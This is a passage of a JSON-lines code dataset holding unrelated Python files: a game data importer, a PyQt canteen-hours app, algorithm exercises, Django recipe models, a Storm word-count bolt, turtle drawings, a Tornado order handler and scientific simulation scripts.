settings.LOCALIZED_STRINGS_MODEL)\n\n # load custom localized strings\n # custom data file's path\n custom_localized_string_path = os.path.join(source_path, settings.LOCALIZED_STRINGS_MODEL)\n\n file_names = glob.glob(custom_localized_string_path + \".*\")\n if file_names:\n print(\"Importing %s\" % file_names[0])\n try:\n import_file(file_names[0], table_name=settings.LOCALIZED_STRINGS_MODEL, clear=False)\n except Exception as e:\n print(\"Import error: %s\" % e)\n\n finally:\n shutil.rmtree(temp_path)\n\n\ndef unzip_resources_all(fp):\n \"\"\"\n Import all resource files from a zip file.\n \"\"\"\n media_dir = os.path.join(settings.MEDIA_ROOT, settings.IMAGE_PATH)\n if not os.path.exists(media_dir):\n os.makedirs(media_dir)\n\n temp_path = tempfile.mkdtemp()\n\n try:\n archive = zipfile.ZipFile(fp, 'r')\n archive.extractall(temp_path)\n source_path = temp_path\n \n # if the zip file contains a root dir\n file_list = os.listdir(temp_path)\n if len(file_list) == 1:\n path = os.path.join(temp_path, file_list[0])\n if os.path.isdir(path):\n source_path = path\n\n copy_tree(source_path, media_dir)\n\n finally:\n shutil.rmtree(temp_path)\n\n\ndef import_data_path(path, clear=True, except_errors=False):\n \"\"\"\n Import data from path.\n\n Args:\n path: (string) data path.\n clear: (boolean) clear old data.\n except_errors: (boolean) except error records and load other records.\n \"\"\"\n\n # import tables one by one\n models = model_mapper.get_all_models()\n for model in models:\n table_name = model.__name__\n file_names = glob.glob(os.path.join(path, table_name) + \".*\")\n\n if file_names:\n print(\"Importing %s\" % file_names[0])\n try:\n import_file(file_names[0], table_name=table_name, clear=clear, except_errors=except_errors)\n except Exception as e:\n print(\"Import error: %s\" % e)\n\n\ndef import_table_path(path, table_name, clear=True, except_errors=False):\n \"\"\"\n Import a table's data from a path.\n\n Args:\n path: (string) data path.\n table_name: (string) table's name.\n clear: (boolean) clear old data.\n except_errors: (boolean) except error records and load other records.\n \"\"\"\n # clear old data\n model = model_mapper.get_model(table_name)\n if not model:\n return\n\n if clear:\n model.objects.all().delete()\n\n if not os.path.isdir(path):\n return\n\n for file_name in os.listdir(path):\n file_name = os.path.join(path, file_name)\n if os.path.isdir(file_name):\n # if it is a folder\n continue\n\n print(\"Importing %s\" % file_name)\n try:\n import_file(file_name, table_name=table_name, clear=False, except_errors=except_errors)\n except Exception as e:\n print(\"Import error: %s\" % e)\n","sub_path":"muddery/worldeditor/services/importer.py","file_name":"importer.py","file_ext":"py","file_size_in_byte":4629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"527420061","text":"from datetime import datetime\r\nfrom PyQt5.QtCore import QTimer, QDateTime, Qt, QSize, QDate, QTime\r\nfrom PyQt5.QtWidgets import QWidget, QListWidgetItem, QMainWindow, QDialog, QDialogButtonBox,QApplication\r\nfrom PyQt5.QtGui import QFont\r\nfrom ui_main import Ui_Real_time_canteen_system\r\nfrom ui_set_time import Ui_SetTimeDialog\r\nfrom ui_store_info import Ui_store_info\r\nfrom ui_queue_cal import Ui_Queue_time_calculater\r\nimport csv\r\nimport sys\r\nimport time\r\n\r\n\r\nclass MainWindow(QMainWindow):\r\n\r\n def __init__(self, store_info):\r\n super().__init__()\r\n\r\n self.store_info = store_info\r\n self.ui = Ui_Real_time_canteen_system()\r\n self.ui.setupUi(self)\r\n self.ui.stores = self.read_in_stores_info()\r\n self.timer = QTimer(self)\r\n self.fix_ui()\r\n self.update_time()\r\n\r\n self.ui.view_current_stores.clicked.connect(self.back_to_current_time)\r\n self.ui.view_current_stores.clicked.connect(self.current_store_list)\r\n self.ui.choose_other_time.clicked.connect(self.user_defined_time)\r\n self.ui.choose_other_time.clicked.connect(self.time_chooser)\r\n self.ui.show_all_stores.clicked.connect(self.show_all_stores)\r\n self.ui.avaliable_store_names2.itemClicked.connect(self.show_store_info)\r\n\r\n\r\n def update_time(self):\r\n #self.timer = QTimer(self)\r\n self.timer.timeout.connect(lambda: self.set_current_time(datetime.now()))\r\n self.timer.start()\r\n\r\n def fix_ui(self):\r\n self.set_current_time(datetime.now())\r\n font = QFont()\r\n font.setPointSize(15)\r\n self.ui.avaliable_store_names2.setFont(font)\r\n\r\n def set_current_time(self, time_point):\r\n self.ui.time_info.setText(time_point.strftime('%F %T'))\r\n\r\n def back_to_current_time(self):\r\n self.fix_ui()\r\n self.ui.time_type.setText(\"Current time:\")\r\n self.update_time()\r\n self.ui.avaliable_store_names2.show()\r\n\r\n def user_defined_time(self):\r\n self.ui.time_type.setText('Time is set to:')\r\n self.ui.avaliable_store_names2.hide()\r\n #timer = QTimer(self)\r\n self.timer.stop()\r\n # self.ui.time_info.setText('0000-00-00 00:00')\r\n\r\n def time_chooser(self):\r\n SetTimeDialog = QDialog()\r\n ui_time_chooser = Ui_SetTimeDialog()\r\n ui_time_chooser.setupUi(SetTimeDialog)\r\n ui_time_chooser.dateEdit.setDate(QDate.currentDate())\r\n ui_time_chooser.hour_spinBox.setValue(QTime.currentTime().hour())\r\n ui_time_chooser.minite_spinBox.setValue(QTime.currentTime().minute())\r\n SetTimeDialog.exec_()\r\n\r\n if SetTimeDialog.result() == 0:\r\n return\r\n\r\n new_time = QDateTime(ui_time_chooser.dateEdit.date())\r\n new_time.setTime(QTime(ui_time_chooser.hour_spinBox.value(),\r\n ui_time_chooser.minite_spinBox.value()))\r\n self.timer.stop()\r\n self.set_current_time(new_time.toPyDateTime())\r\n\r\n self.stores_at_choosed_time(new_time.toPyDateTime())\r\n\r\n\r\n def show_stall_info(self):\r\n item = self.ui.avaliable_stall_names2.currentItem()\r\n #decide the selected stall according to the text on the current item\r\n item_info = item.text()\r\n index = item_info.find('Mon')\r\n stall_name = item_info[:index].rstrip()\r\n date_str = self.ui.time_info.text()[:self.ui.time_info.text().index(' ')]\r\n day = date.fromisoformat(date_str)\r\n weekday = day.strftime('%a')\r\n\r\n stall_info = QDialog(self)\r\n ui_stall_info = Ui_stall_info()\r\n ui_stall_info.setupUi(stall_info)\r\n ui_stall_info.menu_list.addItems(self.menu_list(stall_name,weekday))\r\n\r\n ui_stall_info.call_queue_time.clicked.connect(lambda: self.queue_time_calculater(stall_name))\r\n #stall_info.show()\r\n stall_info.exec_()\r\n\r\n def queue_time_calculater(self,store_name):\r\n\r\n queue_time_calculater = QDialog(self)\r\n ui_queue_time = Ui_Queue_time_calculater()\r\n ui_queue_time.setupUi(queue_time_calculater)\r\n\r\n\r\n ui_queue_time.calculate.clicked.connect(lambda: self.calculate(store_name, ui_queue_time))\r\n queue_time_calculater.exec_()\r\n\r\n def calculate(self,store_name, ui_queue_time):\r\n queue_key = {'Yong Tau Foo':2,\r\n 'Mini Wok':1.5,\r\n 'Mcdonalds':1}\r\n\r\n try:\r\n people_num = int(ui_queue_time.queue_number_entering.text())\r\n except:\r\n ui_queue_time.estimated_queue_time.setText(\"Please enter a valid queuing people number.\")\r\n else:\r\n time = round(people_num*queue_key[store_name])\r\n time_str = str(time)\r\n ui_queue_time.estimated_queue_time.setText(\"The estimated queuing time is: \"+time_str+\" minite.\")\r\n if time > 30:\r\n ui_queue_time.estimated_queue_time.setText(\"The estimated queuing time is: \"+time_str+\" minite.\\nYou are suggested to change a store.\")\r\n\r\n\r\n\r\n\r\n #list 的类型是 self.ui.stores\r\n def store_list(self,list):\r\n #store_list = self.ui.avaliable_store_names2\r\n self.ui.avaliable_store_names2.clear()\r\n self.ui.avaliable_store_names2.addItems(list)\r\n for i in range(len(list)):\r\n self.ui.avaliable_store_names2.item(i).setSizeHint(QSize(0,100))\r\n\r\n\r\n\r\n #店名和营业时间(string)\r\n def read_in_stores_info(self):\r\n stores_list = []\r\n with open(\"allStoresAndTime.csv\", \"r\") as csv_file:\r\n csv_content = csv.reader(csv_file, delimiter=',')\r\n for i in csv_content:\r\n store_name = i[0]\r\n open_time = i[1]\r\n if not store_name.strip() or not open_time.strip():\r\n continue\r\n length = len(store_name)\r\n if length < 16:\r\n stores_list.append(store_name + ' '*(16-length) + open_time)\r\n else:\r\n stores_list.append(store_name + open_time)\r\n\r\n return stores_list\r\n\r\n def show_all_stores(self):\r\n stores = self.ui.stores\r\n self.store_list(stores)\r\n self.ui.avaliable_store_names2.show()\r\n\r\n def stores_at_choosed_time(self,choosed_time):\r\n list = []\r\n weekday = choosed_time.strftime('%a')\r\n time_setted = datetime.strptime(choosed_time.strftime('%H:%M'), '%H:%M')\r\n stores = self.read_in_stores_info()\r\n for i in stores:\r\n try:\r\n Mon_Fri = i[i.index(':')+2:i.index(';')-1]\r\n start_time_Mon_Fri = datetime.strptime(Mon_Fri[:Mon_Fri.index('-')-1], '%H:%M')\r\n end_time_Mon_Fri = datetime.strptime(Mon_Fri[Mon_Fri.index('-')+2:], '%H:%M')\r\n if i.find('Sun') != -1:\r\n sat = i[i.index('Sat')+6:i.index('Sun')-3]\r\n start_time_sat = datetime.strptime(sat[:sat.index('-')-1], '%H:%M')\r\n end_time_sat = datetime.strptime(sat[sat.index('-')+2:], '%H:%M')\r\n sun = i[i.index('Sun')+6:]\r\n start_time_sun = datetime.strptime(sun[:sun.index('-')-1], '%H:%M')\r\n end_time_sun = datetime.strptime(sun[sun.index('-')+2:], '%H:%M')\r\n else:\r\n sat = i[i.index('Sat')+6:]\r\n start_time_sat = datetime.strptime(sat[:sat.index('-')-1], '%H:%M')\r\n end_time_sat = datetime.strptime(sat[sat.index('-')+2:], '%H:%M')\r\n start_time_sun = None\r\n end_time_sun = None\r\n\r\n if self.compare_time_setted(weekday,time_setted,start_time_Mon_Fri,end_time_Mon_Fri,start_time_sat,end_time_sat,start_time_sun,end_time_sun):\r\n list.append(i)\r\n\r\n except ValueError: break\r\n\r\n\r\n self.store_list(list)\r\n self.ui.avaliable_store_names2.show()\r\n\r\n def current_store_list(self):\r\n list = []\r\n #根据时间选出当前店铺\r\n weekday = datetime.now().strftime('%a')\r\n current_time = datetime.strptime(datetime.now().strftime('%H:%M'),'%H:%M')\r\n stores = self.read_in_stores_info()\r\n for i in stores:\r\n try:\r\n Mon_Fri = i[i.index(':')+2:i.index(';')-1]\r\n start_time_Mon_Fri = datetime.strptime(Mon_Fri[:Mon_Fri.index('-')-1], '%H:%M')\r\n end_time_Mon_Fri = datetime.strptime(Mon_Fri[Mon_Fri.index('-')+2:], '%H:%M')\r\n if i.find('Sun') != -1:\r\n sat = i[i.index('Sat')+6:i.index('Sun')-3]\r\n start_time_sat = datetime.strptime(sat[:sat.index('-')-1], '%H:%M')\r\n end_time_sat = datetime.strptime(sat[sat.index('-')+2:], '%H:%M')\r\n sun = i[i.index('Sun')+6:]\r\n start_time_sun = datetime.strptime(sun[:sun.index('-')-1], '%H:%M')\r\n end_time_sun = datetime.strptime(sun[sun.index('-')+2:], '%H:%M')\r\n else:\r\n sat = i[i.index('Sat')+6:]\r\n start_time_sat = datetime.strptime(sat[:sat.index('-')-1], '%H:%M')\r\n end_time_sat = datetime.strptime(sat[sat.index('-')+2:], '%H:%M')\r\n start_time_sun = None\r\n end_time_sun = None\r\n\r\n if self.compare_time_setted(weekday,current_time,start_time_Mon_Fri,end_time_Mon_Fri,start_time_sat,end_time_sat,start_time_sun,end_time_sun):\r\n list.append(i)\r\n\r\n except ValueError: break\r\n\r\n self.store_list(list)\r\n self.ui.avaliable_store_names2.show()\r\n\r\n\r\n def compare_time_setted(self,weekday,time_setted,start_time_Mon_Fri,end_time_Mon_Fri,start_time_sat,end_time_sat,start_time_sun=None,end_time_sun=None):\r\n\r\n if weekday == 'Sun':\r\n try:\r\n if start_time_sun <= time_setted <= end_time_sun:\r\n return True\r\n except:\r\n return False\r\n else:\r\n if weekday == 'Sat':\r\n if start_time_sat <= time_setted <= end_time_sat:\r\n return True\r\n else: return False\r\n else:\r\n if start_time_Mon_Fri <= time_setted <= end_time_Mon_Fri:\r\n return True\r\n else:\r\n return False\r\n\r\n\r\n \r\n #Author: Wang Binli\r\n def morning_or_afternoon(self):\r\n date_str = self.ui.time_info.text()[self.ui.time_info.text().index(' ')+1:]\r\n time = datetime.strptime(date_str, \"%H:%M:%S\")\r\n if time.hour < 10:\r\n return 'mor'\r\n else:\r\n return 'aft'\r\n\r\n #Author: Wang Binli\r\n def menu_list(self,stall_name,weekday):\r\n list = []\r\n time = self.morning_or_afternoon()\r\n file_name = stall_name+time+\".txt\"\r\n menu1 = open(file_name, \"r\")\r\n menu1_list = menu1.readlines()\r\n menu1.close()\r\n n = len(menu1_list)\r\n for i in range(2, n):\r\n if weekday == menu1_list[i].split(',')[0]:\r\n m = len(menu1_list[i].split(','))\r\n for j in range(1,m):\r\n list.append(menu1_list[i].split(',')[j])\r\n break\r\n else:\r\n continue\r\n return list\r\n","sub_path":"main_window.py","file_name":"main_window.py","file_ext":"py","file_size_in_byte":11262,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"595688711","text":"\"\"\"\n 给你一个整数数组 nums ,数组中共有 n 个整数。132 模式的子序列 由三个整数 nums[i]、nums[j] 和 nums[k] 组成,\n 并同时满足:i < j < k 和 nums[i] < nums[k] < nums[j] 。\n 如果 nums 中存在 132 模式的子序列 ,返回 true ;否则,返回 false 。\n 进阶:很容易想到时间复杂度为 O(n^2) 的解决方案,你可以设计一个时间复杂度为 O(n logn) 或 O(n) 的解决方案吗?\n\n 示例 1:\n 输入:nums = [1,2,3,4]\n 输出:false\n 解释:序列中不存在 132 模式的子序列。\n\n 示例 2:\n 输入:nums = [3,1,4,2]\n 输出:true\n 解释:序列中有 1 个 132 模式的子序列: [1, 4, 2] 。\n\n 示例 3:\n 输入:nums = [-1,3,2,0]\n 输出:true\n 解释:序列中有 3 个 132 模式的的子序列:[-1, 3, 2]、[-1, 3, 0] 和 [-1, 2, 0] 。\n\"\"\"\nfrom typing import List\n\n\nclass Solution:\n def find132pattern(self, nums: List[int]) -> bool:\n pass\n\n @classmethod\n def direct_hand(cls, nums) -> bool:\n if not nums:\n return False\n\n min_num = nums[0]\n length = len(nums)\n\n for index in range(1, length):\n for tmp_index in range(length - 1, index, -1):\n if min_num < nums[tmp_index] < nums[index]:\n return True\n min_num = min(min_num, nums[index])\n return False\n\n @classmethod\n def monotonic_stack_hand(cls, nums) -> bool:\n \"\"\"\n 单调栈\n \"\"\"\n if not nums:\n return False\n\n length = len(nums)\n\n # 先求出每个元素左边最小的元素\n left_min_list = [float(\"inf\")] * length\n for i in range(1, length):\n left_min_list[i] = min(left_min_list[i - 1], nums[i - 1])\n\n stack = []\n\n for index in range(length - 1, -1, -1):\n tmp_num = float(\"-inf\")\n\n # 根据单调栈,求出右边最大的元素\n # 单调递增 从栈顶到栈底依次变小\n # 单调递减 从栈顶到栈底依次变大\n # 根据出栈顺序决定, 出栈是变大则是递增反正是变小\n\n while stack and stack[-1] < nums[index]:\n tmp_num = stack.pop()\n\n if left_min_list[index] < tmp_num:\n return True\n stack.append(nums[index])\n\n return False\n\n\nif __name__ == \"__main__\":\n print(Solution.direct_hand([-1, 3, 2, 0]))\n print(Solution.monotonic_stack_hand([3, 4, 2, 6, 4, 5, 2, 3]))\n","sub_path":"algorithm/LeetCode_456_132 模式.py","file_name":"LeetCode_456_132 模式.py","file_ext":"py","file_size_in_byte":2596,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"459324229","text":"from django.db import models\nfrom django.contrib.auth.models import User\nimport datetime as dt\nfrom django.db.models.signals import post_save\nfrom django.dispatch import receiver\nfrom tinymce.models import HTMLField\nfrom url_or_relative_url_field.fields import URLOrRelativeURLField\nfrom django.core.validators import MaxValueValidator\n\n\nclass Profile(models.Model):\n profile_photo=models.ImageField(upload_to='profiles/',default='nyungu.png')\n bio=models.TextField(max_length=500) \n profile_name=models.CharField(max_length =30,blank=True)\n user=models.OneToOneField(User,on_delete=models.CASCADE)\n \n @receiver(post_save, sender=User)\n def create_profile(sender, instance, created, **kwargs):\n if created:\n Profile.objects.create(user=instance)\n\n @receiver(post_save, sender=User)\n def save_profile(sender,instance,**kwargs):\n instance.profile.save()\n\n @classmethod\n def filter_by_id(cls,id):\n profile = Profile.objects.filter(user=id).first()\n return profile\n\n @classmethod\n def get_by_id(cls,id):\n profile=profile.objects.get(user=id)\n return profile\n\n\nclass Category(models.Model):\n category =models.CharField(max_length =30)\n\n def save_category(self):\n self.save()\n\n def __str__(self):\n return self.category\n\n\n\nclass Recipe(models.Model):\n profile = models.ForeignKey(User,null=True,on_delete=models.CASCADE)\n title = models.CharField(max_length=20,blank=True)\n food_image = models.ImageField(upload_to='landing/')\n description = HTMLField(max_length=6000,blank=True)\n link = URLOrRelativeURLField(max_length=200)\n pub_date = models.DateTimeField(auto_now_add=True)\n simplicity = models.IntegerField(default=0)\n serves = models.IntegerField(default=0)\n prep_time = models.IntegerField(default=0)\n category=models.ForeignKey(Category,on_delete=models.CASCADE)\n\n\n\n @classmethod\n def get_profile_recipes(cls,profile):\n recipes = Recipe.objects.filter(profile__pk=profile)\n print(recipes)\n return recipes\n\n @classmethod\n def search_by_recipes(cls,search_term):\n recipes = cls.objects.filter(title__icontains=search_term)\n return recipes\n\n\n def __str__(self):\n return self.title\n\nclass Comments(models.Model):\n comm = models.CharField(max_length = 100, blank = True)\n Recipe = models.ForeignKey(Recipe, related_name = \"comments\")\n\n\n def save_comment(self):\n self.save()\n\n def delete_comment(self):\n Comments.objects.get(id = self.id).delete()\n \n def update_comment(self,new_comment):\n comm = Comments.objects.get(id = self.id)\n comm.comment = new_comment\n comm.save()\n\nclass Ratings(models.Model):\n creativity = models.PositiveIntegerField(default=0,validators=[MaxValueValidator(10)])\n simplicity= models.PositiveIntegerField(default=0,validators=[MaxValueValidator(10)])\n content = models.PositiveIntegerField(default=0,validators=[MaxValueValidator(10)])\n user = models.ForeignKey(User,on_delete=models.CASCADE)\n recipe = models.IntegerField(default=0)\n\n\n","sub_path":"recipe/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3102,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"592964683","text":"from __future__ import absolute_import, print_function, unicode_literals\nfrom collections import Counter\nfrom streamparse.bolt import Bolt\nimport psycopg2\n\n\nclass WordCounter(Bolt):\n\n def initialize(self, conf, ctx):\n self.counts = Counter()\n\n def process(self, tup):\n word = tup.values[0]\n w = None\n\n self.counts[word] += 1\n self.emit([word, self.counts[word]])\n\n # try to connect to database.\n try:\n conn = psycopg2.connect(database=\"tcount\", user=\"postgres\", password=\"pass\", host=\"localhost\", port=\"5432\")\n cur = conn.cursor()\n except:\n self.log('Cannot connect to database')\n exit()\n\n # if there's a word to process, try to find in database.\n cur.execute(\"SELECT word FROM tweetwordcount WHERE word = %s\", [word])\n result = cur.fetchone()\n if result is not None:\n w = result[0]\n conn.commit()\n\n # if the word does not exist in the database, insert it with initial count\n if w != word:\n cur.execute(\"INSERT INTO tweetwordcount (word, count) VALUES (%s, %s)\", (word, self.counts[word]))\n conn.commit()\n else: # otherwise update the word count in the database\n cur.execute(\"UPDATE tweetwordcount SET count = %s WHERE word = %s\",(self.counts[word], word))\n conn.commit()\n\n conn.close()\n\n # Log the count - just to see the topology running\n self.log('%s: %d' % (word, self.counts[word]))\n","sub_path":"exercise_2/tweetwordcount/src/bolts/wordcount.py","file_name":"wordcount.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"105765978","text":"from todo_app.view_model import ViewModel\nfrom todo_app.todo_item import TodoItem\n\ndef test_view_model_todo_items():\n items = [\n TodoItem(1, \"To Do\", \"This is To Do Item\"),\n TodoItem(2, \"Doing\", \"This is Doing Item\"),\n TodoItem(3, \"Done\", \"This is Done\")\n ]\n viewmodel = ViewModel(items)\n todoitems = viewmodel.todo_items\n\n assert len(todoitems) == 1 \n item = todoitems[0]\n assert item.status == 'To Do'\n\ndef test_view_model_doing_items():\n items = [\n TodoItem(1, \"Doing\", \"This is Doing Item\"),\n TodoItem(2, \"To Do\", \"This is Doing Item\"),\n TodoItem(3, \"Done\", \"This is Done\")\n ]\n viewmodel = ViewModel(items)\n doingitems = viewmodel.doing_items\n\n assert len(doingitems) == 1\n item = doingitems[0]\n assert item.status == 'Doing'\n\n\ndef test_view_model_done_items():\n items = [\n TodoItem(1, \"Done\", \"This is Done Item\"),\n TodoItem(2, \"To Do\", \"This is Doing Item\"),\n TodoItem(3, \"Doing\", \"This is Doing\")\n ]\n viewmodel = ViewModel(items)\n doneitems = viewmodel.done_items\n\n assert len(doneitems) == 1\n item = doneitems[0]\n assert item.status == 'Done'\n\n\n\n","sub_path":"tests/test_view_model.py","file_name":"test_view_model.py","file_ext":"py","file_size_in_byte":1191,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"55151077","text":"import turtle\n\nturtle.speed(0)\n\ndef coolshapes(color, fillin, distance, angle, locationx, locationy, loops):\n turtle.penup()\n turtle.setx(locationx)\n turtle.sety(locationy)\n turtle.pencolor(color)\n angle = angle\n \n turtle.pendown()\n turtle.fillcolor(fillin)\n turtle.begin_fill()\n\n for i in range(loops):\n\n turtle.forward(distance)\n turtle.right(angle)\n distance = distance\n \n turtle.end_fill()\n \n\ncoolshapes(\"red\", \"red\", 50, 45, 100, 100, 8)\n\ncoolshapes(\"blue\", \"yellow\", 100, 144, -100, -100, 5)\n\ndef coolspiral(color, distance, angle, locationx, locationy, loops):\n turtle.penup()\n turtle.setx(locationx)\n turtle.sety(locationy)\n turtle.pencolor(color)\n angle = angle\n\n turtle.pendown()\n distance = distance\n\n for i in range(loops):\n\n turtle.forward(distance)\n turtle.left(angle)\n angle += 1\n\ncoolspiral(\"purple\", 7, 1, -100, 100, 40)\n\ncoolshapes(\"teal\", \"white\", 50, 277, 100, -100, 13)\n","sub_path":"Programs/1400_OOP1/Turtle.py","file_name":"Turtle.py","file_ext":"py","file_size_in_byte":996,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"299606640","text":"# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\ndef make_parent(parent: str) -> str:\n parent = parent\n\n return parent\n\ndef make_batch_prediction_job(\n display_name: str,\n model_name: str,\n gcs_source_uri: str,\n gcs_destination_output_uri_prefix: str,\n) -> google.cloud.aiplatform_v1beta1.types.batch_prediction_job.BatchPredictionJob:\n model_parameters_dict = {}\n model_parameters = to_protobuf_value(model_parameters_dict)\n\n batch_prediction_job = {\n \"display_name\": display_name,\n # Format: 'projects/{project}/locations/{location}/models/{model_id}'\n \"model\": model_name,\n \"model_parameters\": model_parameters,\n \"input_config\": {\n \"instances_format\": \"jsonl\",\n \"gcs_source\": {\"uris\": [gcs_source_uri]},\n },\n \"output_config\": {\n \"predictions_format\": \"jsonl\",\n \"gcs_destination\": {\"output_uri_prefix\": gcs_destination_output_uri_prefix},\n },\n }\n\n return batch_prediction_job\n\n","sub_path":".sample_configs/param_handlers/create_batch_prediction_job_text_classification_sample.py","file_name":"create_batch_prediction_job_text_classification_sample.py","file_ext":"py","file_size_in_byte":1540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"436657987","text":"# Definition for an interval.\n# class Interval(object):\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\n\nclass Solution(object):\n\n def mergeSort(self, l):\n if len(l) <= 1:\n return l\n mid = len(l) // 2\n left = self.mergeSort(l[:mid])\n right = self.mergeSort(l[mid:])\n return self.merge(left, right)\n\n def merge(self, left, right):\n if not left:\n return right\n if not right:\n return left\n\n result = [0] * (len(left) + len(right))\n\n p1 = p2 = 0\n\n while p1 < len(left) and p2 < len(right):\n if left[p1].start < right[p2].start:\n result[p1 + p2] = left[p1]\n p1 += 1\n else:\n result[p1 + p2] = right[p2]\n p2 += 1\n\n while p1 < len(left):\n result[p1 + p2] = left[p1]\n p1 += 1\n\n while p2 < len(right):\n result[p1 + p2] = right[p2]\n p2 += 1\n return result\n\n def canAttendMeetings(self, intervals):\n l = self.mergeSort(intervals)\n for i in range(1, len(l)):\n if l[i].start < l[i - 1].end:\n return False\n return True\n","sub_path":"252-meeting-rooms/mergesort.py","file_name":"mergesort.py","file_ext":"py","file_size_in_byte":1247,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"196585262","text":"a=[\"venky\",'venkat',\"venkayyy\"]\nprint(\"%s %s\"%(a[0],a[-1]))\n\ndate=(11,12,2018)\nprint(\"the exam date is :%i /%i /%i\"%date)\n\n\nn=int(input(\"enter a number: \"))\nn1=int(\"%s\"%n)\nn2=int(\"%s%s\"%(n,n))\nn3=int(\"%s%s%s\"%(n,n,n))\nprint(n1+n2+n3)\n\n","sub_path":"requirements/venky_task/prct/colors list.py","file_name":"colors list.py","file_ext":"py","file_size_in_byte":235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"419843199","text":"import tornado.gen\nimport tornado_mysql\nimport logging\nimport uuid\n\nfrom mickey.mysqlcon import get_mysqlcon\nfrom bsslibs.commonutil import MICKEY_ORDER_STAGE_FINAL, MICKEY_DISPATCH_STAGE_FINAL\n\nfrom bsslibs.mickey_operate import Mickey_Operate\n\n_sqlquery = \"\"\"\n UPDATE order_bills a, dispatch_bills b SET a.stage = %s, b.stage = %s WHERE a.sid = b.order_id AND a.sid = %s;\n\"\"\"\n\nclass Mickey_Operate_FinishOrder(Mickey_Operate):\n @tornado.gen.coroutine\n def do(self, userid, data):\n if not data:\n return (403, None)\n\n sid = data.get(\"id\", \"\")\n if not sid:\n logging.error(\"invalid parameter no id\")\n return (403, None)\n\n conn = yield get_mysqlcon()\n if not conn:\n logging.error(\"connect to mysql failed\")\n return (500, None)\n\n rst_code = 200\n\n try:\n cur = conn.cursor()\n yield cur.connection.autocommit(True)\n yield cur.execute(_sqlquery, (MICKEY_ORDER_STAGE_FINAL, MICKEY_DISPATCH_STAGE_FINAL, sid))\n print(_sqlquery % (MICKEY_ORDER_STAGE_FINAL, MICKEY_DISPATCH_STAGE_FINAL, sid))\n cur.close()\n\n except Exception as e:\n logging.error(\"db oper failed {0}\".format(e))\n rst_code = 500\n finally:\n conn.close()\n\n return (rst_code, None)\n \n","sub_path":"bsslibs/mickey_operate_finishorder.py","file_name":"mickey_operate_finishorder.py","file_ext":"py","file_size_in_byte":1366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"333518054","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport sys\nsys.path.append(\"/home/lancy/caffe/python\")\nfrom PIL import Image\nimport caffe\nfrom copy import deepcopy\n\n\ndef gen_net(num):\n caffe.set_device(0)\n caffe.set_mode_gpu()\n\n filename = '2007_000032.jpg'\n im = Image.open(filename)\n m = np.asarray(im, dtype=np.float32)\n m = m[:,:,::-1]\n m -= np.array((104.00698793,116.66876762,122.67891434))\n m = m.transpose((2, 0, 1))\n\n net = caffe.Net(\n \"train_val.prototxt\",\n \"train_iter_\" + str(num) + \".caffemodel\",\n # \"/data/VGG16/caffemodel\",\n # \"../fcn-32s/good.caffemodel\",\n caffe.TRAIN)\n\n net.blobs[\"data\"].reshape(1, *m.shape)\n net.blobs[\"data\"].data[...] = m\n net.forward()\n return net\n\n","sub_path":"fcn-8s/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"521928762","text":"#!/usr/bin/env python\n#\n# Create \"state profiles\" of all protocols.\n#\n#\n#\nimport os\nimport myokit\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nimport sys\nsys.path.append(os.path.abspath('..'))\nfrom state_profile import *\n\n# Load HH model\nm = myokit.load_model(\n os.path.join('..', '..', 'models', 'beattie-2017-ikr-hh.mmt'))\n\n# Set Kylie's sine wave parameters\nm.get('ikr.p1').set_rhs(2.26026076650526e-004)\nm.get('ikr.p2').set_rhs(6.99168845608636e-002)\nm.get('ikr.p3').set_rhs(3.44809941106440e-005)\nm.get('ikr.p4').set_rhs(5.46144197845311e-002)\nm.get('ikr.p5').set_rhs(8.73240559379590e-002)\nm.get('ikr.p6').set_rhs(8.91302005497140e-003)\nm.get('ikr.p7').set_rhs(5.15112582976275e-003)\nm.get('ikr.p8').set_rhs(3.15833911359110e-002)\nm.get('ikr.p9').set_rhs(1.52395993652348e-001)\n\n# Move to stable state at -80mV\nm.get('ikr.act').set_state_value(m.get('ikr.act.inf').pyfunc()(-80))\nm.get('ikr.rec').set_state_value(m.get('ikr.rec.inf').pyfunc()(-80))\n\nif True:\n # Pr 1\n p = myokit.load_protocol(\n os.path.join('..', '7-stat-simulations', 'pr1-modified.mmt'))\n s = myokit.Simulation(m, p)\n d = s.run(p.characteristic_time())\n #plot_profile(\n # 'pr1-state-profile.png', d, 'Pr1 (Activation rate 0mV)', 5000, model=m)\n plot_profile_3d(\n 'pr1-state-profile-3d.png', d, 'Pr1 (Activation rate 0mV)', 5000,\n model=m)\n\n # Pr 2\n p = myokit.load_protocol(\n os.path.join('..', '7-stat-simulations', 'pr2-modified.mmt'))\n s = myokit.Simulation(m, p)\n d = s.run(p.characteristic_time())\n 